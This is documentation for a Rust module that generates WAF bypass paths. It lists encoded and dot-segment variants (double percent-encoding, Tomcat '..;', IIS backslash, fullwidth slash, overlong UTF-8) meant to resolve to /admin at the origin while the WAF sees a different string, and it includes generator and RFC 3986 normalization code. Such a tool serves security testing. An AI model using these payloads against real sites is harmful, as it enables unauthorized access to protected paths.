Module path_norm

Path-normalization differential encoders (dot-segment variants, percent-encoded slash/dot, double-encoded, Tomcat semicolon, IIS backslash, fullwidth slash, overlong UTF-8 dot). Each variant is RFC 3986 §5.2.4-equivalent to the same target, but most WAFs don’t run that exact algorithm.

WAFs and origins frequently disagree on how to normalize a request path. The WAF inspects the raw bytes; the origin (or a middlebox upstream of it) folds them into something else. This module produces the differential payloads — a path that the WAF sees as benign and the origin sees as /admin, or vice versa.

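Every encoder here produces a path that the canonical RFC 3986 §5.2.4 “remove dot segments” algorithm resolves to the target, in most cases only after an origin-specific decoding step (percent-decoding, backslash folding, path-parameter stripping, or Unicode folding) has run first. WAFs that don’t apply the same steps, including most regex-based WAFs and several major cloud-WAF parsers as recently as 2025, see a different string.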
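As a reference point for what "canonical" means here, the following is a minimal sketch of the §5.2.4 procedure (steps A through E of the RFC). The names remove_dot_segments_sketch and pop_last_segment are hypothetical and chosen for illustration; this is not the crate's rfc3986_remove_dot_segments, whose exact signature is not shown on this page.

```rust
/// Hypothetical sketch of RFC 3986 §5.2.4 "Remove Dot Segments".
/// Not the crate's own implementation; names are illustrative only.
pub fn remove_dot_segments_sketch(path: &str) -> String {
    let mut input = path;
    let mut output = String::with_capacity(path.len());

    while !input.is_empty() {
        if let Some(rest) = input.strip_prefix("../") {
            // Step A: drop a leading "../".
            input = rest;
        } else if let Some(rest) = input.strip_prefix("./") {
            // Step A: drop a leading "./".
            input = rest;
        } else if input.starts_with("/./") {
            // Step B: "/./" becomes "/".
            input = &input[2..];
        } else if input == "/." {
            // Step B: a trailing "/." becomes "/".
            input = "/";
        } else if input.starts_with("/../") {
            // Step C: "/../" becomes "/" and the last output segment is removed.
            input = &input[3..];
            pop_last_segment(&mut output);
        } else if input == "/.." {
            // Step C: a trailing "/.." behaves the same way.
            input = "/";
            pop_last_segment(&mut output);
        } else if input == "." || input == ".." {
            // Step D: a lone "." or ".." is discarded.
            input = "";
        } else {
            // Step E: move the first segment (with its leading "/", if any)
            // from the input to the output.
            let start = usize::from(input.starts_with('/'));
            let end = input[start..].find('/').map_or(input.len(), |i| i + start);
            output.push_str(&input[..end]);
            input = &input[end..];
        }
    }
    output
}

/// Remove the last segment of `output` together with its preceding "/".
fn pop_last_segment(output: &mut String) {
    match output.rfind('/') {
        Some(i) => output.truncate(i),
        None => output.clear(),
    }
}
```

Called on /foo/../admin this returns /admin, and on the RFC's own example /a/b/c/./../../g it returns /a/g. The algorithm performs no percent-decoding, so a segment such as %2e%2e passes through untouched unless something decodes it first.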

Coverage:

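  • Dot-segment variants: /foo/../admin, /foo/./admin, /foo/././admin, /foo//admin, /foo/.//admin, /foo//../admin. Pure ASCII. Under strict RFC 3986 §5.2.4, /foo/../admin collapses to /admin and the ./ forms collapse to /foo/admin; the RFC preserves empty segments, so the // forms resolve differently on origins that also merge duplicate slashes.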
  • Percent-encoded dot/slash: /foo/%2e%2e/admin (lower), /foo/%2E%2E/admin (upper), /foo/%2e%2E/admin (mixed), /foo/%2e%2e%2fadmin, /foo/..%2fadmin, /foo/.%2e/admin (literal-dot + encoded-dot).
  • Double percent encoding: /foo/%252e%252e/admin — bypasses WAFs that decode once and check, while origins that decode twice collapse to /admin.
  • Tomcat semicolon segment: /foo/..;/admin. The ..; is a single path segment per RFC but Tomcat/Jetty strip the ;<param> suffix and re-evaluate, exposing the parent directory.
  • Encoded semicolon: /foo/..%3b/admin.
  • Backslash variants (IIS / .NET): /foo/..\\admin, /foo/%5c..%5c/admin. IIS folds backslash to slash; most WAFs don’t.
  • Question-mark suffix smuggle: /foo?/../admin — some WAFs normalize before query-string split, some after.
  • Hash suffix smuggle: /foo#/../admin — same shape.
  • Unicode fullwidth slash: /foo/../admin with U+FF0F (／) standing in for /. NFKC-folding backends fold it back to /.
  • Mixed dot encodings: /foo/%c0%ae%c0%ae/admin, where %c0%ae is the overlong UTF-8 encoding of “.” and the pair spells “..”. Combined with crate::encoding::structural::overlong_utf8 it’s the “mod_security 922110” class.
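To make the percent-encoded and double-encoded entries above concrete, here is a small sketch that builds a few of the listed spellings and shows why a single decoding pass is not enough for the double-encoded form. Both dotdot_variants_sketch and percent_decode_once are hypothetical helpers written for this illustration; they are not part of this module's API, and path_variants may build its output quite differently.

```rust
/// Hypothetical helper: nest a handful of ".." spellings from the coverage
/// list under `prefix`, each aimed at `target`.
pub fn dotdot_variants_sketch(prefix: &str, target: &str) -> Vec<String> {
    let prefix = prefix.trim_end_matches('/');
    let target = target.trim_start_matches('/');
    // Literal, percent-encoded (lower, upper, mixed), half-encoded,
    // double-encoded, and Tomcat-style semicolon spellings.
    const DOTDOT: [&str; 7] = [
        "..", "%2e%2e", "%2E%2E", "%2e%2E", ".%2e", "%252e%252e", "..;",
    ];
    DOTDOT
        .iter()
        .map(|dd| format!("{prefix}/{dd}/{target}"))
        .collect()
}

/// Hypothetical helper: decode percent-escapes exactly once.
/// Malformed escapes are copied through unchanged.
pub fn percent_decode_once(input: &str) -> String {
    let bytes = input.as_bytes();
    let mut out = Vec::with_capacity(bytes.len());
    let hex = |b: u8| (b as char).to_digit(16);
    let mut i = 0;
    while i < bytes.len() {
        if bytes[i] == b'%' && i + 2 < bytes.len() {
            if let (Some(hi), Some(lo)) = (hex(bytes[i + 1]), hex(bytes[i + 2])) {
                // Two hex digits always fit in one byte.
                out.push((hi * 16 + lo) as u8);
                i += 3;
                continue;
            }
        }
        out.push(bytes[i]);
        i += 1;
    }
    String::from_utf8_lossy(&out).into_owned()
}
```

One pass of percent_decode_once over /foo/%252e%252e/admin yields /foo/%2e%2e/admin, which still contains no literal dot segment; only a second pass yields /foo/../admin. A checker that decodes once and an origin that decodes twice therefore reason about different paths.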

Functions

deep_path_collapse
Build a deeply-nested benign path that RFC-3986 collapses to target.
path_variants
Generate every path-normalization differential variant for a target path, given a benign prefix to nest under.
rfc3986_remove_dot_segments
Apply RFC 3986 §5.2.4 “Remove Dot Segments” to a path. Returns the canonical post-normalization path so tests and oracles can verify that every variant collapses to the same target.
slash_encoded_path
Produce a path that uses ONLY percent-encoded slashes, so a WAF that splits on literal / sees one segment but the origin (after percent-decoding) sees the full path.
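The signatures of these functions are not shown on this page, so the following is only a sketch of the two construction ideas described for deep_path_collapse and slash_encoded_path. The names deep_collapse_sketch and slash_encoded_sketch, the depth parameter, the d0, d1, ... directory names, and the choice to keep the leading slash literal are all assumptions made for illustration.

```rust
/// Hypothetical sketch: descend `depth` benign directories, climb back out
/// with the same number of ".." segments, then append `target`.
/// The `depth` parameter and the "d0", "d1", ... names are assumptions.
pub fn deep_collapse_sketch(target: &str, depth: usize) -> String {
    let target = target.trim_start_matches('/');
    let mut path = String::new();
    for i in 0..depth {
        path.push_str(&format!("/d{i}"));
    }
    for _ in 0..depth {
        path.push_str("/..");
    }
    path.push('/');
    path.push_str(target);
    path
}

/// Hypothetical sketch: percent-encode every slash except the leading one,
/// so a splitter that looks for literal '/' sees a single segment.
/// Keeping the leading slash literal is an assumption of this sketch.
pub fn slash_encoded_sketch(path: &str) -> String {
    let body = path.strip_prefix('/').unwrap_or(path);
    format!("/{}", body.replace('/', "%2f"))
}
```

With these definitions, deep_collapse_sketch("/admin", 2) builds /d0/d1/../../admin, which §5.2.4 reduces to /admin, and slash_encoded_sketch("/foo/../admin") builds /foo%2f..%2fadmin, which contains a dot segment only after percent-decoding.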